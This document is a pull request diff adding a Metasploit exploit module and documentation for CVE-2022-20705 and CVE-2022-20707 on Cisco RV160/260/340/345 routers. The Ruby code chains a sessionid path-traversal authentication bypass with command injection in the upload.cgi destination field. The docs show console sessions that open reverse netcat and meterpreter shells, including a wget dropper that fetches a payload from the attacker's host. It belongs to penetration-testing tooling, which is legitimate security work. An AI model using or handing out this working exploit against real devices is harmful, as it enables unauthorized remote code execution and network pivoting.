### PR TITLE
Cisco RV LAN Exploit - CVE-2022-20705 and CVE-2022-20707

### DIFF
--- a/documentation/modules/exploit/linux/http/cisco_rv340_lan.md
+++ b/documentation/modules/exploit/linux/http/cisco_rv340_lan.md
@@ -1,16 +1,22 @@
-## Cisco RV340 and RV345 Firmware 1.0.03.24 and below
+## Vulnerable Application
 
-This module exploits two vulnerabilities, an authentication bypass (CVE-2022-20705) and a command injection vulnerability (CVE-2022-20707), to execute code on Cisco RV340x Small Business Routers as the www-data user. The command injection occurs in the upload.cgi script, where user input is passed to curl without any sanitization. Additionally, a session ID cookie can be abused for a path traversal vulnerability, which can be used to bypass authentication by checking for a valid file in the session ID field.
+This module exploits two vulnerabilities, an authentication bypass (CVE-2022-20705) and a command injection vulnerability (CVE-2022-20707),
+to execute code on Cisco RV340x Small Business Routers as the `www-data` user. The command injection occurs in the `upload.cgi` script,
+where user input is passed to `curl` without any sanitization. Additionally, the `sessionid` session cookie can be abused for a path
+traversal vulnerability, which can be used to bypass authentication by checking for a valid file in the session ID field.
 
-Vulnerable up to, and tested against, firmware version 1.0.03.24. Version 1.0.03.26 removes these vulnerabilities.    
-
-Credit to Biem Pham at Sea Security for finding and weaponizing the exploits.  
-
-Credit to jbaines-r7 as most code in this module was adapted from cisco_rv_series_authbypass_and_rce.
+Vulnerable up to, and tested against, firmware version 1.0.03.24. Version 1.0.03.26 removes these vulnerabilities.
 
 ### Installation
 
 Vulnerable software: https://software.cisco.com/download/home/286287791/type/282465789/release/1.0.03.24
+
+Log into the modem.  Default IP address is 192.168.1.1 and default credentials
+are cisco for username and password.  The `administration` option on the left
+side of the web page will take you to a form with a `Manual Upgrade` section.
+Leave `File Type: ` on default `Firmware Image` option.  Change `Upgrade From:` option to `PC`.  Press the `Upgrade` button.
+Press `Yes` on the message box asking `Are you sure you want to upgrade the firmware right now?`.  Wait for router
+reboot to complete.
 
 ## Verification Steps
 
@@ -20,30 +26,17 @@ Vulnerable software: https://software.cisco.com/download/home/286287791/type/282
 4. Do: `set lhost <listening ip>`
 5. Do: `set rhost <target ip>`
 6. Do: `exploit`
-
-Exploit will print out `Exploit successfully executed` User can verify with `id` command
-
-Non-vulnerable versions (1.0.03.26 and above) will not create a session
-
-## Targets
-
-### 0
-
-This targets router with `reverse_netcat` payload and returns a shell
-
-### 1
-
-This target obtains a meterpreter session using `wget` by default, but `curl` also works
+7. Verify: You see the message "Exploit successfully executed" confirming the exploit completed
+8. Verify: You are the "www-data" user using the `id` command
 
 ## Options
-
-### TARGETURI
-
-Specified the base URI. The default value is `/`.
 
 ## Scenarios
 
 ### Reverse Netcat Output
+
+Cisco RV340 Router running 1.0.03.24 on ARM architecture
+
 ```
 msf6 > use modules/exploits/linux/http/cisco_rv340_lan
 [*] Using configured payload cmd/unix/reverse_netcat
@@ -65,6 +58,8 @@ uid=33(www-data) gid=33(www-data) groups=33(www-data)
 
 ```
 ### Meterpreter Linux Dropper
+
+Cisco RV340 Router running 1.0.03.24 on ARM architecture
 
 ```
 msf6 > use modules/exploits/linux/http/cisco_rv340_lan

--- a/documentation/modules/exploit/linux/http/cisco_rv340_lan.md
+++ b/documentation/modules/exploit/linux/http/cisco_rv340_lan.md
@@ -1,11 +1,14 @@
 ## Vulnerable Application
 
 This module exploits two vulnerabilities, an authentication bypass (CVE-2022-20705) and a command injection vulnerability (CVE-2022-20707),
-to execute code on Cisco RV340x Small Business Routers as the `www-data` user. The command injection occurs in the `upload.cgi` script,
-where user input is passed to `curl` without any sanitization. Additionally, the `sessionid` session cookie can be abused for a path
-traversal vulnerability, which can be used to bypass authentication by checking for a valid file in the session ID field.
+to execute code on Cisco RV160, RV260, RV340, and RV345 Small Business Routers prior to 1.0.03.26 as the
+`www-data` user. The command injection occurs in the `upload.cgi` script, where user input in the `data` POST parameter
+is passed to `curl` without any sanitization. Additionally, the `sessionid` session cookie can be abused for a path
+traversal vulnerability, which can be used to bypass authentication by setting `sessionid` to the path to a valid
+file on the target.
 
-Vulnerable up to, and tested against, firmware version 1.0.03.24. Version 1.0.03.26 removes these vulnerabilities.
+This module has been tested against an RV340 device running firmware version 1.0.03.24. 
+Firmware version 1.0.03.26 patches these vulnerabilities.
 
 ### Installation
 
@@ -14,13 +17,13 @@ https://software.cisco.com/download/home/286287791/type/282465789/release/1.0.03
 
 To install this firmware, follow the following directions:
 1. Log into the modem. The default IP address is 192.168.1.1 and the default credentials
-   are `cisco` for the username and password.  
-2. The `administration` option on the left side of the web page will take you to a form 
+   are `cisco` for the username and password.
+2. The `administration` option on the left side of the web page will take you to a form
    with a `Manual Upgrade` section.
-3. Leave `File Type: ` on the default `Firmware Image` option.  
-4. Change `Upgrade From:` option to `PC`. 
+3. Leave `File Type: ` on the default `Firmware Image` option.
+4. Change `Upgrade From:` option to `PC`.
 5. Press the `Upgrade` button.
-6. Press `Yes` on the message box asking `Are you sure you want to upgrade the firmware right now?`.  
+6. Press `Yes` on the message box asking `Are you sure you want to upgrade the firmware right now?`.
 7. Wait for router reboot to complete.
 
 ## Verification Steps

--- a/documentation/modules/exploit/linux/http/cisco_rv340_lan.md
+++ b/documentation/modules/exploit/linux/http/cisco_rv340_lan.md
@@ -1,0 +1,99 @@
+## Cisco RV340 and RV345 Firmware 1.0.03.24 and below
+
+This module exploits two vulnerabilities, an authentication bypass (CVE-2022-20705) and a command injection vulnerability (CVE-2022-20707), to execute code on Cisco RV340x Small Business Routers as the www-data user. The command injection occurs in the upload.cgi script, where user input is passed to curl without any sanitization. Additionally, a session ID cookie can be abused for a path traversal vulnerability, which can be used to bypass authentication by checking for a valid file in the session ID field.
+
+Vulnerable up to, and tested against, firmware version 1.0.03.24. Version 1.0.03.26 removes these vulnerabilities.    
+
+Credit to Biem Pham at Sea Security for finding and weaponizing the exploits.  
+
+Credit to jbaines-r7 as most code in this module was adapted from cisco_rv_series_authbypass_and_rce.
+
+### Installation
+
+Vulnerable software: https://software.cisco.com/download/home/286287791/type/282465789/release/1.0.03.24
+
+## Verification Steps
+
+1. Install the vulnerable firmware
+2. Start `msfconsole`
+3. Do: `use modules/exploits/linux/http/cisco_rv340_lan`
+4. Do: `set lhost <listening ip>`
+5. Do: `set rhost <target ip>`
+6. Do: `exploit`
+
+Exploit will print out `Exploit successfully executed` User can verify with `id` command
+
+Non-vulnerable versions (1.0.03.26 and above) will not create a session
+
+## Targets
+
+### 0
+
+This targets router with `reverse_netcat` payload and returns a shell
+
+### 1
+
+This target obtains a meterpreter session using `wget` by default, but `curl` also works
+
+## Options
+
+### TARGETURI
+
+Specified the base URI. The default value is `/`.
+
+## Scenarios
+
+### Reverse Netcat Output
+```
+msf6 > use modules/exploits/linux/http/cisco_rv340_lan
+[*] Using configured payload cmd/unix/reverse_netcat
+msf6 exploit(linux/http/cisco_rv340_lan) > set lhost 192.168.1.142
+lhost => 192.168.1.142
+msf6 exploit(linux/http/cisco_rv340_lan) > set rhost 192.168.1.1
+rhost => 192.168.1.1
+msf6 exploit(linux/http/cisco_rv340_lan) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.142:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. The device responded to exploitation with a 200 OK.
+[*] Executing Unix Command for cmd/unix/reverse_netcat
+[*] Command shell session 1 opened (192.168.1.142:4444 -> 192.168.1.1:55885) at 2023-02-05 10:06:22 -0500
+[+] Exploit successfully executed.
+
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+```
+### Meterpreter Linux Dropper
+
+```
+msf6 > use modules/exploits/linux/http/cisco_rv340_lan
+[*] Using configured payload cmd/unix/reverse_netcat
+msf6 exploit(linux/http/cisco_rv340_lan) > set lhost 192.168.1.142
+lhost => 192.168.1.142
+msf6 exploit(linux/http/cisco_rv340_lan) > set rhost 192.168.1.1
+rhost => 192.168.1.1
+msf6 exploit(linux/http/cisco_rv340_lan) > set target 1
+target => 1
+msf6 exploit(linux/http/cisco_rv340_lan) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.142:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. The device responded to exploitation with a 200 OK.
+[*] Executing Linux Dropper for linux/armle/meterpreter/reverse_tcp
+[*] Using URL: http://192.168.1.142:8080/3b2NfBKR0OS
+[*] Client 192.168.1.1 (Wget) requested /3b2NfBKR0OS
+[*] Sending payload to 192.168.1.1 (Wget)
+[*] Sending stage (934728 bytes) to 192.168.1.1
+[+] Exploit successfully executed.
+[*] Command Stager progress - 100.00% done (117/117 bytes)
+[*] Meterpreter session 2 opened (192.168.1.142:4444 -> 192.168.1.1:55950) at 2023-02-05 10:12:37 -0500
+[*] Server stopped.
+
+meterpreter > shell
+Process 11012 created.
+Channel 1 created.
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+```

--- a/documentation/modules/exploit/linux/http/cisco_rv340_lan.md
+++ b/documentation/modules/exploit/linux/http/cisco_rv340_lan.md
@@ -9,14 +9,19 @@ Vulnerable up to, and tested against, firmware version 1.0.03.24. Version 1.0.03
 
 ### Installation
 
-Vulnerable software: https://software.cisco.com/download/home/286287791/type/282465789/release/1.0.03.24
+Firmware version 1.0.03.24, which is vulnerable to CVE-2022-20705 and CVE-2022-20707, can be downloaded from
+https://software.cisco.com/download/home/286287791/type/282465789/release/1.0.03.24
 
-Log into the modem.  Default IP address is 192.168.1.1 and default credentials
-are cisco for username and password.  The `administration` option on the left
-side of the web page will take you to a form with a `Manual Upgrade` section.
-Leave `File Type: ` on default `Firmware Image` option.  Change `Upgrade From:` option to `PC`.  Press the `Upgrade` button.
-Press `Yes` on the message box asking `Are you sure you want to upgrade the firmware right now?`.  Wait for router
-reboot to complete.
+To install this firmware, follow the following directions:
+1. Log into the modem. The default IP address is 192.168.1.1 and the default credentials
+   are `cisco` for the username and password.  
+2. The `administration` option on the left side of the web page will take you to a form 
+   with a `Manual Upgrade` section.
+3. Leave `File Type: ` on the default `Firmware Image` option.  
+4. Change `Upgrade From:` option to `PC`. 
+5. Press the `Upgrade` button.
+6. Press `Yes` on the message box asking `Are you sure you want to upgrade the firmware right now?`.  
+7. Wait for router reboot to complete.
 
 ## Verification Steps
 
@@ -26,16 +31,14 @@ reboot to complete.
 4. Do: `set lhost <listening ip>`
 5. Do: `set rhost <target ip>`
 6. Do: `exploit`
-7. Verify: You see the message "Exploit successfully executed" confirming the exploit completed
-8. Verify: You are the "www-data" user using the `id` command
+7. Verify: You see the message `Exploit successfully executed` confirming the exploit completed
+8. Verify: You are the `www-data` user using the `id` command
 
 ## Options
 
 ## Scenarios
 
-### Reverse Netcat Output
-
-Cisco RV340 Router running 1.0.03.24 on ARM architecture
+### Cisco RV340 Router 1.0.03.24 on ARM architecture - reverse_netcat payload
 
 ```
 msf6 > use modules/exploits/linux/http/cisco_rv340_lan
@@ -55,11 +58,9 @@ msf6 exploit(linux/http/cisco_rv340_lan) > exploit
 
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
-
 ```
-### Meterpreter Linux Dropper
 
-Cisco RV340 Router running 1.0.03.24 on ARM architecture
+### Cisco RV340 Router 1.0.03.24 on ARM architecture - reverse_tcp ARMLE Meterpreter payload
 
 ```
 msf6 > use modules/exploits/linux/http/cisco_rv340_lan
@@ -90,5 +91,4 @@ Process 11012 created.
 Channel 1 created.
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
-
 ```

--- a/modules/exploits/linux/http/cisco_rv340_lan.rb
+++ b/modules/exploits/linux/http/cisco_rv340_lan.rb
@@ -38,8 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://blog.security.sea.com/posts/pwn2own-2021-rv340/'], # Possibly down
           [ 'CVE', '2022-20701'],
           [ 'CVE', '2022-20705'],
-          [ 'CVE', '2022-20707'],
-          [ 'CVE', '2022-20705']
+          [ 'CVE', '2022-20707']
         ],
         'Targets' => [
           [

--- a/modules/exploits/linux/http/cisco_rv340_lan.rb
+++ b/modules/exploits/linux/http/cisco_rv340_lan.rb
@@ -15,11 +15,11 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Cisco RV34X Series Authentication Bypass and Command Injection',
+        'Name' => 'Cisco RV Series Authentication Bypass and Command Injection',
         'Description' => %q{
           This module exploits two vulnerabilities, a session ID directory traversal authentication
-          bypass (CVE-2022-20705) and a command injection vulnerability (CVE-2022-20707), on Cisco RV340 and RV345
-          Small Business Routers, allowing attackers to gain remote shell access with www-data user privileges.
+          bypass (CVE-2022-20705) and a command injection vulnerability (CVE-2022-20707), on Cisco RV160, RV260, RV340,
+          and RV345 Small Business Routers, allowing attackers to execute arbitrary commands with www-data user privileges.
           This access can then be used to pivot to other parts of the network. This module works on firmware
           versions 1.0.03.24 and below.
         },
@@ -45,10 +45,11 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => 'unix',
               'Arch' => ARCH_CMD,
               'Type' => :unix_cmd,
-              'Payload' => {},
+              'Payload' => {
+                'BadChars' => '\'#;'
+              },
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_netcat',
-                'BadChars' => '\''
+                'PAYLOAD' => 'cmd/unix/reverse_netcat'
               }
             }
           ],
@@ -59,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Arch' => [ARCH_ARMLE],
               'Type' => :linux_dropper,
               'Payload' => {
-                'BadChars' => '\''
+                'BadChars' => '\'#;;'
               },
               'CmdStagerFlavor' => [ 'wget', 'curl' ],
               'DefaultOptions' => {
@@ -89,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   # sessionid utilized later needs to be set to length
-  # of 16 or exploit will fail.  Tested with lengths
+  # of 16 or exploit will fail. Tested with lengths
   # 14-17
   def generate_session_id
     return Rex::Text.rand_text_alphanumeric(16)
@@ -104,28 +105,32 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     }, 10)
 
-    # A proper "upload" will trigger file creation.  So created above is an incorrect "upload" call to avoid file
-    # creation. The router return a status code 405 Not Allowed if authentication has been bypassed by above request.
-    # The firmware containing this authentication bypass also contains the command injection vulnerability that will be
-    # abused during actual exploitation. Non-vulnerable firmware versions will respond with 403 Forbidden.
+    # A proper "upload" will trigger file creation. So the send_request_cgi call
+    # above is an incorrect "upload" call to avoid creating a file on disk. The router will return
+    # status code 405 Not Allowed if authentication has been bypassed by the above request.
+    # The firmware containing this authentication bypass also contains the command injection
+    # vulnerability that will be abused during actual exploitation. Non-vulnerable
+    # firmware versions will respond with 403 Forbidden.
     if res.nil?
       return CheckCode::Unknown('The device did not respond to request packet.')
-    elsif !res.nil? && res.code == 405
+    elsif res.code == 405
       return CheckCode::Appears('The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.')
     elsif res.code == 403
       return CheckCode::Safe('The device is not vulnerable to exploitation.')
     else # Catch-all
-      return CheckCode::Unknown('The target responded in such a way that exploitation in unknown and unlikely.')
+      return CheckCode::Unknown('The target responded in an unexpected way. Exploitation is unlikely.')
     end
   end
 
   def execute_command(cmd, _opts = {})
     res = send_exploit(cmd)
 
-    # Successful unix_cmd shells should not produce a response. But check the response code if it does, and throw
-    # Failure::NotVulnerable if 403 Forbidden is status code
-    if target['Type'] == :unix_cmd && !res.nil? && res.code == 403
-      fail_with(Failure::NotVulnerable, 'The target responded with 403 Forbidden and is not vulnerable')
+    # Successful unix_cmd shells should not produce a response.
+    # However if a response is returned, check the status code and return
+    # Failure::NotVulnerable if it is 403 Forbidden.
+    if target['Type'] == :unix_cmd
+      fail_with(Failure::Unreachable, 'The target did not respond') unless res
+      fail_with(Failure::NotVulnerable, 'The target responded with 403 Forbidden and is not vulnerable') unless res&.code == 403
     end
 
     if target['Type'] == :linux_dropper
@@ -136,7 +141,7 @@ class MetasploitModule < Msf::Exploit::Remote
         fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json
       rescue JSON::ParserError => e
         print_error("Failed: #{e.class} - #{e.message}")
-        return nil
+        fail_with(Failure::UnexpectedReply, 'Failed to parse the response returned from the server! Its possible the response may not be JSON!')
       end
     end
 
@@ -149,11 +154,11 @@ class MetasploitModule < Msf::Exploit::Remote
     input = Rex::Text.rand_text_alphanumeric(5..12)
 
     # sessionid utilized later needs to be set to length
-    # of 16 or exploit will fail.  Tested with lengths
+    # of 16 or exploit will fail. Tested with lengths
     # 14-17
     sessionid = Rex::Text.rand_text_alphanumeric(16)
 
-    filepath = '/tmp/upload.input'
+    filepath = '/tmp/upload.input' # This file must exist and be writeable by www-data so we just use the temporary upload file to prevent issues.
     pathparam = 'Configuration'
 
     destination = "'; " + cmd + ' #'

--- a/modules/exploits/linux/http/cisco_rv340_lan.rb
+++ b/modules/exploits/linux/http/cisco_rv340_lan.rb
@@ -17,29 +17,25 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Cisco RV34X Series Authentication Bypass and Command Injection',
         'Description' => %q{
-          This module exploits a sessionid directory traversal authentication bypass, a sessionid
-          improper input validation authentication bypass, and command injection on Cisco RV340 and
-          RV345 Small Business Routers. All vulnerabilities were discovered by Bien Pham
-          at Sea Security.
-
-          This module works on firmware versions 1.0.03.24 and below
+          This module exploits two vulnerabilities, a session ID directory traversal authentication
+          bypass (CVE-2022-20705) and a command injection vulnerability (CVE-2022-20707), on Cisco RV340 and RV345
+          Small Business Routers, allowing attackers to gain remote shell access with www-data user privileges.
+          This access can then be used to pivot to other parts of the network. This module works on firmware
+          versions 1.0.03.24 and below.
         },
         'License' => MSF_LICENSE,
         'Platform' => ['Linux', 'Unix'],
         'Author' => [
           'Biem Pham',  # Vulnerability Discoveries
           'Neterum',    # Metasploit Module
-          'jbaines-r7'  # This metasploit module is heavily inspired from
-          # cisco_rv_series_authbypass_and_rce.rb
+          'jbaines-r7'  # Inspired from cisco_rv_series_authbypass_and_rce.rb
         ],
         'DisclosureDate' => '2021-11-02',
         'Arch' => [ARCH_CMD, ARCH_ARMLE],
         'References' => [
-          [ 'URL', 'https://blog.security.sea.com/posts/pwn2own-2021-rv340/'], # Possibly down
           [ 'CVE', '2022-20705'], # Authentication Bypass
           [ 'CVE', '2022-20707'], # Command Injection
-          [ 'ZDI', '22-409'], # Authentication Bypass
-          [ 'ZDI', '22-410'], # Path Traversal leading to Authentication Bypass
+          [ 'ZDI', '22-410'], # Authentication Bypass
           [ 'ZDI', '22-411']  # Command Injection
         ],
         'Targets' => [
@@ -51,7 +47,8 @@ class MetasploitModule < Msf::Exploit::Remote
               'Type' => :unix_cmd,
               'Payload' => {},
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_netcat'
+                'PAYLOAD' => 'cmd/unix/reverse_netcat',
+                'BadChars' => '\''
               }
             }
           ],
@@ -110,26 +107,27 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if target['Type'] != :unix_cmd
       fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
-      body_json = res.get_json_document
-      fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json
+      begin
+        body_json = res.get_json_document
+        fail_with(Failure::NotFound, 'The target did not respond with a JSON body') unless body_json
+      rescue JSON::ParserError => e
+        print_error("Failed: #{e.class} - #{e.message}")
+        return nil
+      end
     end
 
     print_good('Exploit successfully executed.')
   end
 
   def send_exploit(cmd)
-    user = Rex::Text.rand_text_alphanumeric(5..12)
-    pass = Rex::Text.rand_text_alphanumeric(5..12)
     filename = Rex::Text.rand_text_alphanumeric(5..12)
     fileparam = Rex::Text.rand_text_alphanumeric(5..12)
     input = Rex::Text.rand_text_alphanumeric(5..12)
 
-    send_request_cgi({
-      'encode_params' => false,
-      'method' => 'POST',
-      'uri' => '/jsonrpc',
-      'data' => format('{"jsonrpc": "2.0", "method": "login", "params": {"user": "%<user>s", "pass": "%<pass>s"}}', user: user, pass: pass)
-    })
+    # sessionid utilized later needs to be set to length
+    # of 16 or exploit will fail.  Tested with lengths
+    # 14-17
+    sessionid = Rex::Text.rand_text_alphanumeric(16)
 
     filepath = '/tmp/upload.input'
     pathparam = 'Configuration'
@@ -149,7 +147,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => '/upload',
       'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
       'headers' => {
-        'Cookie' => 'sessionid =../../../etc/passwd; sessionid=aaaaaaaaaaaaaaaa'
+        'Cookie' => 'sessionid =../../../etc/passwd; sessionid=' + sessionid
       },
       'data' => multipart_form.to_s
     }, 10)

--- a/modules/exploits/linux/http/cisco_rv340_lan.rb
+++ b/modules/exploits/linux/http/cisco_rv340_lan.rb
@@ -36,9 +36,11 @@ class MetasploitModule < Msf::Exploit::Remote
         'Arch' => [ARCH_CMD, ARCH_ARMLE],
         'References' => [
           [ 'URL', 'https://blog.security.sea.com/posts/pwn2own-2021-rv340/'], # Possibly down
-          [ 'CVE', '2022-20701'],
-          [ 'CVE', '2022-20705'],
-          [ 'CVE', '2022-20707']
+          [ 'CVE', '2022-20705'], # Authentication Bypass
+          [ 'CVE', '2022-20707'], # Command Injection
+          [ 'ZDI', '22-409'], # Authentication Bypass
+          [ 'ZDI', '22-410'], # Authentication Bypass
+          [ 'ZDI', '22-411']  # Command Injection
         ],
         'Targets' => [
           [
@@ -117,20 +119,23 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def send_exploit(cmd)
+    user = Rex::Text.rand_text_alphanumeric(5..12)
+    pass = Rex::Text.rand_text_alphanumeric(5..12)
+    filename = Rex::Text.rand_text_alphanumeric(5..12)
+    fileparam = Rex::Text.rand_text_alphanumeric(5..12)
+    input = Rex::Text.rand_text_alphanumeric(5..12)
+
     send_request_cgi( {
                         'encode_params' => false,
                         'method' => 'POST',
                         'uri' => '/jsonrpc',
-                        'data' => '{"jsonrpc": "2.0", "method": "login", "params": {"user": "bienpnn", "pass": "bienpnn"}}'
+                        'data' => '{"jsonrpc": "2.0", "method": "login", "params": {"user": "%{user}", "pass": "%{pass}"}}' % { user: user, pass: pass}
                         })
 
     filepath = '/tmp/upload.input'
-    filename = 'bienpnn'
     pathparam = 'Configuration'
-    fileparam = 'bienpnn'
 
-    destination = '\'; ' + cmd + " #"
-    input = 'bienpnn'
+    destination = "'; " + cmd + " #"
 
     multipart_form = Rex::MIME::Message.new
     multipart_form.add_part(filepath, nil, nil, 'form-data; name="file.path"')
@@ -138,7 +143,7 @@ class MetasploitModule < Msf::Exploit::Remote
     multipart_form.add_part(pathparam, nil, nil, 'form-data; name="pathparam"')
     multipart_form.add_part(fileparam, nil, nil, 'form-data; name="fileparam"')
     multipart_form.add_part(destination, nil, nil, 'form-data; name="destination"')
-    multipart_form.add_part(input, 'application/octet-stream', nil, 'form-data; name="input"; filename="bienpnn"')
+    multipart_form.add_part(input, 'application/octet-stream', nil, 'form-data; name="input"; filename="%{filename}"' % { filename: filename })
 
     send_request_cgi({
                        'method' => 'POST',

--- a/modules/exploits/linux/http/cisco_rv340_lan.rb
+++ b/modules/exploits/linux/http/cisco_rv340_lan.rb
@@ -30,7 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'Biem Pham',  # Vulnerability Discoveries
           'Neterum',    # Metasploit Module
           'jbaines-r7'  # This metasploit module is heavily inspired from
-                        # cisco_rv_series_authbypass_and_rce.rb
+          # cisco_rv_series_authbypass_and_rce.rb
         ],
         'DisclosureDate' => '2021-11-02',
         'Arch' => [ARCH_CMD, ARCH_ARMLE],
@@ -49,8 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Platform' => 'unix',
               'Arch' => ARCH_CMD,
               'Type' => :unix_cmd,
-              'Payload' => {
-              },
+              'Payload' => {},
               'DefaultOptions' => {
                 'PAYLOAD' => 'cmd/unix/reverse_netcat'
               }
@@ -125,17 +124,17 @@ class MetasploitModule < Msf::Exploit::Remote
     fileparam = Rex::Text.rand_text_alphanumeric(5..12)
     input = Rex::Text.rand_text_alphanumeric(5..12)
 
-    send_request_cgi( {
-                        'encode_params' => false,
-                        'method' => 'POST',
-                        'uri' => '/jsonrpc',
-                        'data' => '{"jsonrpc": "2.0", "method": "login", "params": {"user": "%{user}", "pass": "%{pass}"}}' % { user: user, pass: pass}
-                        })
+    send_request_cgi({
+      'encode_params' => false,
+      'method' => 'POST',
+      'uri' => '/jsonrpc',
+      'data' => format('{"jsonrpc": "2.0", "method": "login", "params": {"user": "%<user>s", "pass": "%<pass>s"}}', user: user, pass: pass)
+    })
 
     filepath = '/tmp/upload.input'
     pathparam = 'Configuration'
 
-    destination = "'; " + cmd + " #"
+    destination = "'; " + cmd + ' #'
 
     multipart_form = Rex::MIME::Message.new
     multipart_form.add_part(filepath, nil, nil, 'form-data; name="file.path"')
@@ -143,17 +142,17 @@ class MetasploitModule < Msf::Exploit::Remote
     multipart_form.add_part(pathparam, nil, nil, 'form-data; name="pathparam"')
     multipart_form.add_part(fileparam, nil, nil, 'form-data; name="fileparam"')
     multipart_form.add_part(destination, nil, nil, 'form-data; name="destination"')
-    multipart_form.add_part(input, 'application/octet-stream', nil, 'form-data; name="input"; filename="%{filename}"' % { filename: filename })
+    multipart_form.add_part(input, 'application/octet-stream', nil, format('form-data; name="input"; filename="%<filename>s"', filename: filename))
 
     send_request_cgi({
-                       'method' => 'POST',
-                       'uri' => '/upload',
-                       'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
-                       'headers' => {
-                         'Cookie' => 'sessionid =../../../etc/passwd; sessionid=aaaaaaaaaaaaaaaa'
-                       },
-                       'data' => multipart_form.to_s
-                     }, 10)
+      'method' => 'POST',
+      'uri' => '/upload',
+      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
+      'headers' => {
+        'Cookie' => 'sessionid =../../../etc/passwd; sessionid=aaaaaaaaaaaaaaaa'
+      },
+      'data' => multipart_form.to_s
+    }, 10)
   end
 
   def exploit

--- a/modules/exploits/linux/http/cisco_rv340_lan.rb
+++ b/modules/exploits/linux/http/cisco_rv340_lan.rb
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Arch' => ARCH_CMD,
               'Type' => :unix_cmd,
               'Payload' => {
-                'BadChars' => '\'#;'
+                'BadChars' => '\'#'
               },
               'DefaultOptions' => {
                 'PAYLOAD' => 'cmd/unix/reverse_netcat'
@@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Arch' => [ARCH_ARMLE],
               'Type' => :linux_dropper,
               'Payload' => {
-                'BadChars' => '\'#;;'
+                'BadChars' => '\'#'
               },
               'CmdStagerFlavor' => [ 'wget', 'curl' ],
               'DefaultOptions' => {
@@ -128,9 +128,8 @@ class MetasploitModule < Msf::Exploit::Remote
     # Successful unix_cmd shells should not produce a response.
     # However if a response is returned, check the status code and return
     # Failure::NotVulnerable if it is 403 Forbidden.
-    if target['Type'] == :unix_cmd
-      fail_with(Failure::Unreachable, 'The target did not respond') unless res
-      fail_with(Failure::NotVulnerable, 'The target responded with 403 Forbidden and is not vulnerable') unless res&.code == 403
+    if target['Type'] == :unix_cmd && res&.code == 403
+      fail_with(Failure::NotVulnerable, 'The target responded with 403 Forbidden and is not vulnerable')
     end
 
     if target['Type'] == :linux_dropper

--- a/modules/exploits/linux/http/cisco_rv340_lan.rb
+++ b/modules/exploits/linux/http/cisco_rv340_lan.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'CVE', '2022-20705'], # Authentication Bypass
           [ 'CVE', '2022-20707'], # Command Injection
           [ 'ZDI', '22-409'], # Authentication Bypass
-          [ 'ZDI', '22-410'], # Authentication Bypass
+          [ 'ZDI', '22-410'], # Path Traversal leading to Authentication Bypass
           [ 'ZDI', '22-411']  # Command Injection
         ],
         'Targets' => [

--- a/modules/exploits/linux/http/cisco_rv340_lan.rb
+++ b/modules/exploits/linux/http/cisco_rv340_lan.rb
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
           versions 1.0.03.24 and below.
         },
         'License' => MSF_LICENSE,
-        'Platform' => ['Linux', 'Unix'],
+        'Platform' => ['linux', 'unix'],
         'Author' => [
           'Biem Pham',  # Vulnerability Discoveries
           'Neterum',    # Metasploit Module
@@ -33,10 +33,10 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2021-11-02',
         'Arch' => [ARCH_CMD, ARCH_ARMLE],
         'References' => [
-          [ 'CVE', '2022-20705'], # Authentication Bypass
-          [ 'CVE', '2022-20707'], # Command Injection
-          [ 'ZDI', '22-410'], # Authentication Bypass
-          [ 'ZDI', '22-411']  # Command Injection
+          ['CVE', '2022-20705'], # Authentication Bypass
+          ['CVE', '2022-20707'], # Command Injection
+          ['ZDI', '22-410'], # Authentication Bypass
+          ['ZDI', '22-411']  # Command Injection
         ],
         'Targets' => [
           [

--- a/modules/exploits/linux/http/cisco_rv340_lan.rb
+++ b/modules/exploits/linux/http/cisco_rv340_lan.rb
@@ -92,10 +92,14 @@ class MetasploitModule < Msf::Exploit::Remote
     # Ripped from jbaines-r7 cisco_rv_series_authbypass_and_rce
     # Test to see if router is responding and possibly vulnerable
     res = send_exploit('id')
-    return CheckCode::Unknown("Didn't receive a response from the target.") unless res
-    return CheckCode::Safe('The target did not respond with a 200 OK.') unless res.code == 200
 
-    if res.body.include?('"jsonrpc":"2.0"') || res.body.include?('<head><title>301 Moved Permanently</title></head>')
+    return CheckCode::Unknown("Didn't receive a response from the target.") if res.nil?
+
+    # Versions 1.0.03.26 and above will respond with 403 Forbidden during exploitation
+    return CheckCode::Safe('The target responded with 403 Forbidden and is not vulnerable.') if res.code == 403
+
+    # Vulnerable versions will respond with 301 Moved Permanently in body of response
+    if res.body.include?('<head><title>301 Moved Permanently</title></head>')
